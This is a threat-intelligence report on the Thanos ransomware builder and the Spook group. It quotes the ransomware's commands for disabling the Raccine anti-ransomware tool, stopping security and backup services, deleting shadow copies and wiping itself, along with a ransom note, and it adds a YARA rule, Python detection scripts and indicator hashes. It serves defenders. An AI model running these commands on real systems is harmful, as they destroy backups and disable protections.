In a blog post entitled “The story of a ransomware builder: from Thanos to Spook and beyond (Part 1)”, our colleagues from CERT-SEKOIA described the results of an incident response engagement on a Spook ransomware attack. We then took over and investigated the Thanos builder used by the short-lived Spook group and by many other groups.
1.1 From Thanos to Spook
Online documentation shared by the cybersecurity community quickly stressed a link between the Spook ransomware and the Thanos ransomware. The Spook ransomware group, like many other cybercriminal groups, uses auto-generated ransomware to impact its targets. The use of malware builders is quite common in the cybercriminal ecosystem. It has two main benefits: it delegates the complexity to a more qualified developer, and it saves a lot of time during the weaponization step of an attack.
The Spook ransomware samples appear to be created by the Thanos builder. This builder has been sold on underground forums since late 2019 according to the information we could find on these forums.
Thanos selling post (Source SEKOIA.IO)
The builder offers the ransomware group a simple GUI where it can customize its ransomware.
Thanos ransomware builder options, 2020. (Source: Recorded Future)
The builder allows threat actors to build a custom ransomware sample with multiple options (found in the resource once decrypted):
- Custom ransom notes content and filename
- Extensions of files to encrypt
- Extension to add to encrypted files
- Bitcoin address
- Change wallpaper
- Multiple OPSEC features (obfuscation, kill defenders, anti-VM, etc)
This report focuses on the version used by the Spook ransomware group. Still, variants of other groups will have similar functionality.
Spook ransomware execution
To achieve their goals, Spook samples (and by extension other ransomware created with the Thanos builder) perform several actions:
- Disable the Raccine anti-ransomware tool
- Change configuration of multiple services
- Set persistence
- Kill the processes designated in the config file
- Delete Shadow Copies
- Encrypt files
- Display the ransom note
- Delete artefacts
Those actions are performed using simple commands that can be found in the configuration file, which our colleagues extracted with the tool they created during the incident response step (see Part 1).
Disabling the Raccine anti-ransomware tool
Raccine (https://github.com/Neo23x0/Raccine) is a simple, open-source anti-ransomware tool. It kills any process that tries to delete the Shadow Copies, which is why the ransomware must disable it before continuing. Being an open-source project, it should be deployed in production with caution.
Here are some simple commands used by Thanos samples to perform Raccine deactivation:
"taskkill" /F /IM RaccineSettings.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
"reg" delete HKCU\Software\Raccine /F
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
Kill tasks and stop services
Thanos-built samples reconfigure and stop multiple services using three tools: “sc.exe”, “net.exe” and “taskkill.exe”. Backup, database and security-product services and processes are stopped so that the files they hold open, which would otherwise be write-locked, can be encrypted. Note that a few services (FDResPub, Dnscache, SSDPSRV, upnphost) are instead set to start automatically and started rather than stopped.
"sc.exe" config FDResPub start= auto
"sc.exe" config Dnscache start= auto
"sc.exe" config SQLTELEMETRY start= disabled
"sc.exe" config SstpSvc start= disabled
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
"sc.exe" config SSDPSRV start= auto
"sc.exe" config upnphost start= auto
"sc.exe" config SQLWriter start= disabled
"net.exe" start Dnscache /y
"net.exe" stop bedbg /y
"net.exe" start FDResPub /y
"net.exe" stop MSSQL$SQL_2008 /y
"net.exe" start SSDPSRV /y
"net.exe" stop avpsus /y
"net.exe" stop NetBackup BMR MTFTP Service /y
"net.exe" stop BMR Boot Service /y
"net.exe" stop McAfeeDLPAgentService /y
"net.exe" stop MSSQL$SQLEXPRESS /y
…
"taskkill.exe" /IM mspub.exe /F
"taskkill.exe" /IM mspub.exe /F
"taskkill.exe" /IM synctime.exe /F
"taskkill.exe" /IM mydesktopqos.exe /F
"taskkill.exe" /IM Ntrtscan.exe /F
"taskkill.exe" /IM mysqld.exe /F
…
Set persistence
The Spook samples simply create a .lnk file in a Startup folder to gain persistence on infected systems.
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk
Delete shadow copies
To ensure that the target will not be able to restore its files, the ransomware tries to delete the Shadow Copies by running this PowerShell command:
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
However, the Spook sample found by our colleagues failed to delete the Shadow Copies. If the command ran exactly as shown above, “$_Delete()” (rather than “$_.Delete()”) is not a valid method call in PowerShell, which alone would explain the failure.
Encrypt files
The ransomware walks the drives and encrypts every file whose extension matches one of those specified by the user in the builder. Files are encrypted with AES-256 in CBC mode, and the AES key is protected with a 2048-bit RSA public key. An interesting detail is that the AES key can either be specified in the builder or generated automatically at run time. If a static key is specified, it is embedded in the sample, can be recovered from it, and can be used to decrypt the files without the operator's RSA private key.
We saw a Spook sample open a fake console window asking the user to wait patiently while the computer is being encrypted. This fake window is often used by samples created by the recent RobinHood group.
“Please wait” console opened by Spook, Source SEKOIA.IO
Print the ransom file to the user
At the end of its execution, the ransomware warns the user in several ways that the files on the computer have been encrypted. It drops multiple .txt and .hta ransom files and tries to open the .hta file with “mshta.exe” or the .txt file with “notepad.exe”. It also raises a notification in the Windows notification area. Some samples additionally try to print the ransom note if a connected printer is detected.
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Spook ransom note (Source SEKOIA.IO)
Delete the executable file
At the end, the ransomware deletes itself using the following cmd command:
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
This command overwrites the first 524288 bytes (512 KB) of the executable with zeros before deleting it, so that the beginning of the file cannot be recovered from disk. The same command is used by the LockBit ransomware according to this Fortinet article.
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe
Note that the “cmd.exe” commands used by the sample embed a disguised 3-second sleep, giving the ransomware process time to exit before its file is deleted:
- choice /C Y /N /D Y /T 3: presents a choice with the single option “Y”, suppresses the prompt (/N), defaults to “Y” (/D Y) and waits 3 seconds (/T 3) before taking the default.
- ping 127.0.0.7 -n 3 > Nul: sends 3 echo requests to a loopback address about one second apart and discards the output, which takes a few seconds.
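The commands quoted in this section are simple enough to detect from process-creation telemetry (Sysmon event ID 1, EDR command lines). As an added example that is not code from this post or from SEKOIA.IO's tooling, the following Python script scores command lines against the Thanos execution steps described above and recovers the hidden sleep delays. The log lines are constructed to mirror the quoted commands, the rule names are the example's own, and treating the ransom-note display as part of T1486 is an assumption of the example.

```python
"""Added example (not from the SEKOIA.IO post): flag Thanos/Spook-style
command lines in process-creation telemetry.

Patterns follow the commands quoted in the post. Technique IDs follow the
post's ATT&CK mapping; tagging the ransom-note display as T1486 is an
assumption of this example. SAMPLE_EVENTS are constructed, not real logs.
"""
import re

# Each rule: (rule name, ATT&CK technique, regex applied to the command line).
RULES = [
    ("raccine_tamper", "T1562.001",
     re.compile(r'RaccineSettings\.exe|Software\\Raccine|Raccine Rules Updater|Raccine Tray', re.I)),
    # Only "start= disabled" and "net stop" count; the post shows a few
    # services being set to auto-start instead, which we do not flag here.
    ("service_disable", "T1489",
     re.compile(r'\bsc(\.exe)?"?\s+config\s+\S+\s+start=\s*disabled|\bnet(\.exe)?"?\s+stop\b', re.I)),
    ("shadow_copy_delete", "T1490",
     re.compile(r'Win32_Shadowcopy|vssadmin(\.exe)?"?\s+delete\s+shadows', re.I)),
    ("ransom_note_display", "T1486",
     re.compile(r'mshta(\.exe)?"?\s+.*RESTORE_FILES_INFO\.hta', re.I)),
    ("self_delete_wipe", "T1070.004",
     re.compile(r'fsutil\s+file\s+setZeroData.*&\s*Del\b|choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*Del\b', re.I)),
]

# Disguised sleeps: "choice /T N" waits N seconds; "ping -n N" to a loopback
# address sends N requests about one second apart (roughly N-1 seconds).
CHOICE_SLEEP = re.compile(r'choice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+(\d+)', re.I)
PING_SLEEP = re.compile(r'ping\s+127\.0\.0\.\d+\s+-n\s+(\d+)', re.I)


def disguised_sleep_seconds(cmdline):
    """Return the approximate delay (seconds) hidden in a cmd.exe one-liner, or 0."""
    m = CHOICE_SLEEP.search(cmdline)
    if m:
        return int(m.group(1))
    m = PING_SLEEP.search(cmdline)
    if m:
        return max(int(m.group(1)) - 1, 0)
    return 0


def classify(cmdline):
    """Return the list of (rule name, technique) hits for one command line."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(cmdline)]


def triage(events):
    """events: iterable of dicts with 'image' and 'cmdline'.
    Returns ({(rule, technique): [cmdlines]}, [sleep seconds found])."""
    hits, sleeps = {}, []
    for ev in events:
        for key in classify(ev["cmdline"]):
            hits.setdefault(key, []).append(ev["cmdline"])
        delay = disguised_sleep_seconds(ev["cmdline"])
        if delay:
            sleeps.append(delay)
    return hits, sleeps


# Constructed sample telemetry modelled on the commands quoted in the post.
SAMPLE_EVENTS = [
    {"image": "taskkill.exe", "cmdline": '"taskkill" /F /IM RaccineSettings.exe'},
    {"image": "reg.exe", "cmdline": '"reg" delete HKCU\\Software\\Raccine /F'},
    {"image": "schtasks.exe", "cmdline": '"schtasks" /DELETE /TN "Raccine Rules Updater" /F'},
    {"image": "sc.exe", "cmdline": '"sc.exe" config SQLWriter start= disabled'},
    {"image": "sc.exe", "cmdline": '"sc.exe" config SSDPSRV start= auto'},
    {"image": "net.exe", "cmdline": '"net.exe" stop McAfeeDLPAgentService /y'},
    {"image": "powershell.exe", "cmdline": 'powershell.exe Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete(); }'},
    {"image": "mshta.exe", "cmdline": '"C:\\Windows\\System32\\mshta.exe" C:\\Users\\Admin\\Desktop\\RESTORE_FILES_INFO.hta'},
    {"image": "cmd.exe", "cmdline": '"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\\x.exe" & Del /f /q "C:\\x.exe"'},
    {"image": "cmd.exe", "cmdline": '"cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\\Users\\Admin\\AppData\\Local\\Temp\\x.exe"'},
    {"image": "notepad.exe", "cmdline": 'notepad.exe C:\\Users\\Admin\\notes.txt'},  # benign
]

if __name__ == "__main__":
    hits, sleeps = triage(SAMPLE_EVENTS)
    for (name, tid), lines in hits.items():
        print(f"{tid} {name}: {len(lines)} hit(s)")
    print("disguised sleeps (s):", sleeps)
```

The service rule deliberately ignores the “start= auto” reconfigurations so that the count reflects defensive services being stopped; a production rule would also want the image name and parent process (a ransomware binary spawning sc.exe, not an administrator's console) to cut false positives.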
Unlike other variants, the Spook samples do not seem to be able to exfiltrate files by themselves (the builder allows adding an FTP exfiltration feature). Data exfiltration must therefore be done with another tool such as RClone. However, half of the known Spook samples try to download PsExec during their execution, as the incident response in Part 1 attests. The Spook ransomware seems simpler than other variants: exfiltration and lateral movement capabilities are delegated to other tools.
Another difference between Spook and older variants (such as Prometheus') is that we did not see the Spook ransomware stopping services using “net.exe stop”. Most Spook samples cannot spread themselves across the network by changing firewall rules, enabling SMB and copying themselves with “net use”, as Prometheus could.
Prometheus is a ransomware group that was active in early 2021. For more details, you can read the Cybereason report about Prometheus. What is described there about the Thanos builder corresponds to what we could observe.
1.2 Samples from different Threat Actors
Starting from the Spook samples that were given to us, we hunted for similar files using YARA rules and other pivots on malware databases. This hunting allowed us to find many Thanos samples from multiple groups.
rule ransomware_win_thanos {
meta:
version = "2"
malware = "Thanos"
description = "Detect the ransomware from the Thanos builder"
source = "SEKOIA.IO"
creation_date = "2021-06-07"
strings:
$s1 = "$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B" ascii
$s2 = "b__" ascii
condition:
uint16(0)==0x5A4D and filesize < 600KB and $s1 and #s2 == 3
}
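To make the rule's condition concrete, here is an added example (not code from the post) that evaluates each of its sub-conditions in plain Python, without yara-python; it is useful for understanding why the exact “#s2 == 3” count makes the rule both precise and brittle. The buffers it scans are constructed for the example, not real Thanos samples.

```python
"""Added example, not code from the SEKOIA.IO post: evaluate the condition of
the post's ransomware_win_thanos YARA rule in plain Python.
All sample buffers below are constructed for the example, not real samples."""

# Strings and limits copied from the rule.
MZ_HEADER = b"MZ"                                # uint16(0) == 0x5A4D (little-endian "MZ")
S1 = b"$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B"    # $s1 ascii
S2 = b"b__"                                      # $s2 ascii
MAX_SIZE = 600 * 1024                            # filesize < 600KB


def evaluate(data: bytes) -> dict:
    """Return each sub-condition of the rule evaluated on `data`.

    YARA's #s2 counts every occurrence of the string; bytes.count() counts
    non-overlapping ones, which is identical for "b__" since the pattern
    cannot overlap with itself."""
    return {
        "mz": data[:2] == MZ_HEADER,
        "size_ok": len(data) < MAX_SIZE,
        "s1": S1 in data,
        "s2_count": data.count(S2),
    }


def matches_thanos_rule(data: bytes) -> bool:
    """uint16(0)==0x5A4D and filesize < 600KB and $s1 and #s2 == 3"""
    c = evaluate(data)
    return c["mz"] and c["size_ok"] and c["s1"] and c["s2_count"] == 3


def build_sample(b_count: int = 3, pad: int = 4096,
                 with_mz: bool = True, with_s1: bool = True) -> bytes:
    """Construct a fake PE-like buffer holding `b_count` copies of "b__"."""
    body = bytearray(MZ_HEADER if with_mz else b"XX")
    body += b"\x00" * pad
    if with_s1:
        body += S1
    # Separate the "b__" occurrences so the count is unambiguous.
    body += b"".join(S2 + b"\x00" * 16 for _ in range(b_count))
    return bytes(body)


if __name__ == "__main__":
    cases = [
        ("3 x b__ (matches)", build_sample()),
        ("4 x b__ (count mismatch)", build_sample(b_count=4)),
        ("no MZ header", build_sample(with_mz=False)),
        ("no $s1", build_sample(with_s1=False)),
        ("600KB or more", build_sample(pad=MAX_SIZE)),
    ]
    for label, buf in cases:
        print(f"{label:26s} -> {matches_thanos_rule(buf)} {evaluate(buf)}")
```

A sample padded or repacked by the operator so that “b__” appears four times, or one larger than 600 KB, silently drops out of the rule; when hunting, it pays to also run a relaxed variant (for example “#s2 >= 3” and no size cap) and review the extra hits by hand.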
As Thanos is an off-the-shelf ransomware, it is not surprising that it is used by many groups. Here is a list of groups that use the Thanos builder:
Name | Note file name | Encrypted file extension | Estimated period of activity | Double extortion
---|---|---|---|---
Thanos | RESTORE_FILES_INFO.txt | .crypted / <random string> | | Yes
Hakbit | HOW_TO_RECOVER_YOUR_FILES.txt / HELP_ME_RECOVER_MY_FILES.txt / HELP_ME_MY_FILES_NOT_MAKE_PUBLIC.txt | .[<victim_id>].[<email_addr>].CRYSTAL / .VIPxxx | 04/2020 – 05/2020 | 
Abarcy | Abarcy#2996.txt | .abarcy | | 
Hard | RESTORE_FILES_INFO.txt | .hard | | 
Milleni5000 | RESTORE_FILES_INFO.txt | .secure | | 
Ravack | HELP_ME_RECOVER_MY_FILES.txt | .ravack | | 
Energy | HOW_TO_DECYPHER_FILES.txt | .energy[potentialenergy@mail.ru] | | 
josephnull | HOW_TO_DECYPHER_FILES.hta | .crypted | 07/2020 | 
Alumni | HOW_TO_RECOVER_YOUR_FILES.txt | .alumni | | 
Prometheus | RESTORE_FILES_INFO.txt | .[<victim_id>].PROM[<email_addr>] / .<victim_id>[<email_addr>] | 01/2021 – 05/2021 | Yes
RecoveryGroup | RESTORE_FILES_INFO.txt | .<victim_name> | 03/2021 – 08/2021 | 
Haron | RESTORE_FILES_INFO.txt | .<victim_name> | 07/2021 | Yes
Undetermined Russian-speaking group | Инструкция.txt | none | | 
pingp0ng | decrypt_info.txt | .[<victim_id>].[<email_addr>].noname | | 
@Online7_365 | decrypt_info.txt | .[<victim_id>].[<email_addr>].boooom / .[<victim_id>].[<email_addr>].helpme | 08/2021 – 12/2021 | 
Spook | RESTORE_FILES_INFO.txt | .<victim_id> | 09/2021 – 10/2021 | Yes
RobinHood | RESTORE_FILES_INFO.txt | .<victim_id> | 10/2021 – current | Yes
Steroik | RESTORE_FILES_INFO.txt | .<victim_id> | 10/2021 | 
Midas | RESTORE_FILES_INFO.txt | .newwave | 12/2021 | Yes
This list continues Cybereason's work from SEKOIA.IO's point of view on the usage of the Thanos builder. It is not exhaustive, and we found many Thanos samples that we were not able to attribute to a known ransomware group. As the table shows, the Thanos builder is used by dangerous double extortion groups as well as by script kiddies. Most of them keep the default or a common ransom note name and encrypted file extension, which makes those two artefacts of little use for attribution. The content of the ransom note, however, usually leads us to the ransomware group.
2. Ransomware current context
2.1 Who was the Spook ransomware group?
The Spook ransomware group operated between September 2021 and October 2021. It used the previously described Thanos builder to generate Spook samples carrying the following ransom message:
YOUR COMPANY WAS HACKED AND COMPROMISED!!! All your important files have been encrypted! Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. ________________________________________________________________________________ For us this is just business and to prove to you our seriousness, we will decrypt you three files for free. Just open our website, upload the encrypted files and get the decrypted files for free. _______________________________________________________________________________ ! WARNING ! Whole your network was fully COMPROMISED! We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports, Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients. We got even more info about your partners and even about your staff. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. ________________________________________________________________________________ IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. 
________________________________________________________________________________ WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. Instructions for contacting us: ________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=754WRBXZ24 and paste it in the Tor browser. c. Start a chat and follow the further instructions. Key Identifier: …
This message contains many English mistakes, which is consistent with operators who are not native English speakers; the builder itself is sold on Russian-speaking forums.
As the note shows, the group practised double extortion. Data from targeted organizations was published on an onion leak website. It is interesting to note that Spook's website and that of the former Prometheus ransomware group are very similar:
Prometheus website screenshot, Source: Cyble
Moreover, according to S2W's blog, an old file tied to a Prometheus victim was found in the exact same location on the Spook WordPress server.
During its short period of activity, the Spook ransomware group announced it had hit 38 organizations, all published on its website between September 26, 2021, and October 19, 2021.
During this time and according to the statements of the group, France was the most affected country, with 9 companies being targeted (which represents 23.7% of all known attacks).
Countries most impacted by the Spook ransomware known campaigns
The industries that were impacted the most included the financial, the manufacturing and the retail ones.
2.2 Multiplication of ransomware groups – where do the borders stand between them?
As per our observations, ransomware builders are regularly shared on many hacking forums. Very often the developer shares or sells the builder; in other cases the ransomware source code is leaked by third parties.
Example of a ransomware builder released on a hacking forum
In any case, building kits allows threat actors to create customized ransomware, with the possibility to create numerous variants with different configurations for each campaign.
The generated ransomware samples are thus more likely to escape detection, and attribution becomes much more challenging.
It is not uncommon for threat actors in the ransomware industry to be involved in several ransomware groups or projects. For this reason, there is an increasing focus on ransomware affiliates and operators rather than on clearly separated groups.
3. Conclusion
Posted on hacking forums in February 2020, the Thanos builder is still being used by many ransomware actors, with varying degrees of experience, to develop new malware variants and conduct malicious campaigns.
In this blog post, we analyzed one of the latest ransomware developed with the Thanos builder.
Given Spook’s short period of activity, a large number of victims, and what has been observed by our colleagues during the incident response, we think that the former Prometheus group acquired multiple accesses by using the services of an access broker and recreated a quick arsenal using the Thanos builder to monetize these accesses.
4. Annexes
4.1 Mapping MITRE ATT&CK
Technique ID | Technique Name
---|---
T1583.003 | Acquire Infrastructure: Virtual Private Server |
T1588.001 | Obtain Capabilities: Malware |
T1078 | Valid Accounts |
T1027 | Obfuscated Files or Information |
T1140 | Deobfuscate/Decode Files or Information |
T1059.001 | Command and Scripting Interpreter: PowerShell |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
T1112 | Modify Registry |
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
T1562.001 | Impair Defenses: Disable or Modify Tools |
T1562.004 | Impair Defenses: Disable or Modify System Firewall |
T1570 | Lateral Tool Transfer |
T1071 | Application Layer Protocol |
T1489 | Service Stop |
T1490 | Inhibit System Recovery |
T1016 | System Network Configuration Discovery |
T1083 | File and Directory Discovery |
T1486 | Data Encrypted for Impact |
T1070.003 | Indicator Removal on Host: Clear Command History |
T1070.004 | Indicator Removal on Host: File Deletion |
4.2 YARA Rules
rule ransomware_win_thanos {
meta:
version = "2"
malware = "Thanos"
description = "Detect the ransomware from the Thanos builder"
source = "SEKOIA"
creation_date = "2021-06-07"
strings:
$s1 = "$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B" ascii
$s2 = "b__" ascii
condition:
uint16(0)==0x5A4D and filesize < 600KB and $s1 and #s2 == 3
}
4.3 Indicators
SHA256 | Attribution
---|---
ce686daaf9d97fb2c42d9789d19f1dbdb81d1b45851cf3d9e67f46b578365764 | |
d11fca3f8e2be9c5926e5e87f06dca48a19156c3296a589131d86f9a5d6fbc8f | |
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024 | Hakbit |
edcac243808957cc898d4a08a8b0d5eaf875f5f439a3ca0acfaf84522d140e7e | |
34b93f1989b272866f023c34a2243978565fcfd23869cacc58ce592c1c545d8e | Hakbit |
6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47 | |
28a0fd7612bea3f286e5ff4e7b109dcaf46f9defed663af50d20a0b2086e13ac | |
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d | |
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554 | Prometheus |
1c3ecb9ea4d4690c7a96581aa25d26f02392fe6a104b61c2fcd0a68bde11f8d2 | |
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd | |
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184 | Prometheus |
8d268be58a27d2c980b807ffe703ea28b0fd0cd1ba2e455902faebe9ec17c52e | RecoveryGroup |
899f48bad035165acf8869af63922619f8a901bbeb8a7fc13919ba90dd9e7768 | |
8a4a038a965ba42a0442d44abf25e4d21f5049d4a4a8aa9cb6691ec4282814a1 | |
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3 | Prometheus |
11aebdff8c064c160c2b21f3a844bacaecd581d9dc2e4224d31903d2a56e2dd3 | Prometheus |
8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7 | Prometheus |
ef97bf49a9bd00a994143852590cc3a2d20227e510dc2b5968704d8f100b4d3c | RecoveryGroup |
3605b9af44b153ef39a5bbe6d98ab8e6ef58b1f0f1c76eca4a3fb9b9a4042605 | |
7891062da6c81bf31c740f9c33aac10224104bf2f6ab6bdf9c1e3895d07011ed | |
3c3a8067481153f82f3fb4d967c44cd735e635f75bb417e1f94492ee02df145a | filerestore000 |
8dab7d5add0f7ca61c5f3bc6aae6dea30086ea3e0719d302748234b3ac4e31f8 | Prometheus |
4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c | RecoveryGroup |
caf815381680cfa6afedcd7c7af5a5c838788b1c7ec593ce817114a25ab63441 | RecoveryGroup |
81411c9010f2adcb4758bac5ed6128d5a76b24689d477f6ed2c3003fd57e4f3b | RecoveryGroup |
66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2 | Haron |
6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c | Haron |
cbdb04d23e395b270e16d7ca81cc6b734039fa069932989d4e4f4d4d266df28b | Haron |
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327 | |
c6d7c39e83f12684cc9341305044fb03a61d23876d37746d96d31a9191bacb8f | |
34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89 | |
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120 | RecoveryGroup |
eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46 | Streriok |
7f56c9ac52ad69fc02e73b653384a07397571ed12673c6eacd9ed574d371975f | |
bb744238e99e7654395a3c19fb4d491fffcdcd7a96c914f898a649ca39f11a33 | @Online7_365 |
e5d4335e72a6d1cad51de1f30dbb29c4942fa5574891cd0b0ed35a252b088028 | Skull |
2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21 | |
84a47f4362ecaa832b466a392a827f77471fa4056e9e538c727aff4a6a6b48b4 | Spook |
e347fd231a543a5dfd53b01ff0bc67b2bf37593e7ddc036f15bac8ad92f0d707 | Spook |
8dad29bd09870ab9cacfdea9e7ab100d217ff128aea64fa4cac752362459991c | Spook |
d991aa2b1fad608b567be28e2d13d3d4f48eea3dea8f5d51a8e42aa9a2637426 | |
32ec78179b1516765fd2ec4da82404352cb6837a906c7493283ef578930273e6 | Spook |
869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf | Spook |
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de | Spook |
44edca2989cfa4ba819191b70323fe5f83e300dd0c2e66abb42f1f9ca831f29b | Spook |
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216 | Spook |
b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e | Spook |
5ee42cc91ee256752213dbd7525816273a29257df0c52984865b7c34c51df1a2 | MedusaLocker |
720f92a0233c07cfdafca70dc95b841682fdefd434835eca106c308f1dc8dc50 | KukaJamba |
d4820f3c561fd274c69d01c9446951fca10291f728ab0ead0537a4eabd0f4b1d | RobinHood |
80379b9640f070381ef346cc2998a127abf3e75de6339801e415734140186fa0 | |
c841ca56516b51ffa4b808209cad755960dd07ae0ce13c73a85cf635d076a7f5 | @Online7_365 |
20fa2538c879182151b86f35518d90952e24acd7078f84a4a01850e780574201 | @Online7_365 |
e64edc53f3457a0608354c18f398787fc2d281a9f4246724d2d73d9ddc34a861 | |
74a717027b6212236662bf641c473b8f8cd65486898b02940357bb9b3035f38a | |
ca729ac6a7a2dbf47191c1a30d6aea9f3d8580c1e146a7a2b70858e7c61ea686 | |
d6a68bf279f5e39d52b518a4b925361325376b276052379c7ac700fd7c8dae5b | |
21bcf864de80dc43669a1e6ad68ab5959f9e4c258b9ea2043a229cdb7343d095 | |
6f08e40dd82613ecc87195778aaced37960609935b47cc45cc499f10cf57f685 | RobinHood |
7b6a67b6de160992ade99643e4f82fbe55c9122bd3db3e586ecd215033d3c838 | @Online7_365 |
0a66157cca6b9aa3c3de9c76d55638f438c63b9d7189d41a8eb8da02ce1371b5 | RobinHood |
43f627c288a92f89d6c089480faf9a5d2b935c5c1796e5776a01ed18cf4aa857 | RobinHood |
c76c9ad75741a9d0f9fe66ba41f6fdfd67ad0ebe6cf354e75c420648ddb6ca9f | |
575d1ef0e51fbe96e7454b8f06b60118faf3e4ed7ef0f98908d0fcca6c0a9b82 | Midas |
e9d0ee963a1463694686ea347989ef9c80cb06f91602ccbcde178e04a6062509 | |
40eafc1053e4b93ac0767032e3df1d65bd839f4bf6d7f239c72e1bab862e6d48 | KukaJamba |
aa207e58d8f8c2e48b10bd86b0cc1e6fc9edba51b57ab29fde7052840ac2b8b8 | RobinHood |
fc0341bde264eead7433140738cc1088a9b02e6d6bfc6a51a80af9602e7ab3e7 | RobinHood |
7eba89ee9f4ce6fad19f7e86cdf076456beb89f9f5a731380f352b54e120952b | RobinHood |
08d6b4739df157c6cf8a767267b86c77de44db881500ffdc4e709dd0de1c3d9a | RobinHood |
5. Sources
- https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b
- https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/
- https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware
- https://www.recordedfuture.com/thanos-ransomware-builder/
- https://medium.com/s2wblog/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd